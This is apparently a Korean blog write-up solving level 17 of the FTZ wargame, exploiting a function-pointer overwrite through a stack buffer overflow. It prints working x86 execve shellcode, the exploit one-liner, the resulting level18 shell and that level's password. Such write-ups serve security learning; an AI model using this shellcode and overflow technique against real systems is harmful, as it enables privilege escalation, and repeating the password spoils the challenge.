[FTZ] level17 풀이

💡 FTZ level17 풀이

문제

계정 : level17/king poetic

hint

#include <stdio.h>

void printit() {
  printf("Hello there!\n");
}

main()
{ int crap;
  void (*call)()=printit;
  char buf[20];
  fgets(buf,48,stdin);
  setreuid(3098,3098);
  call();
}

풀이

16번과 동일한데, 쉘 코드가 주어지지 않았습니다. 따라서 기존에 하던 방식으로 환경변수에 쉘 코드를 넣고, 주소를 환경변수로 바꿔주면 됩니다.

환경 변수를 선언하고, 그 주소를 구해 줍니다.

[level17@ftz level17]$ export SHELLCODE=$(python -c 'print("\x90"*30+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")')
[level17@ftz level17]$
[level17@ftz level17]$ cd tmp
[level17@ftz tmp]$ echo 'int main(){printf("%p\n",getenv("SHELLCODE"));}' >> env.c
[level17@ftz tmp]$ gcc -o env env.c
[level17@ftz tmp]$ ./env
0xbffffc6d

call 주소를 0xbffffc6d로 덮어줍니다.

gdb를 분석하는건 생략하겠습니다.

call 변수와 buf 변수의 차이는 40바이트 입니다.

[level17@ftz level17]$ (python -c 'print("A"*40+"\x6d\xfc\xff\xbf")';cat) | ./attackme

id
uid=3098(level18) gid=3097(level17) groups=3097(level17)
my-pass
TERM environment variable not set.

Level18 Password is "why did you do it".

쉘을 획득했습니다.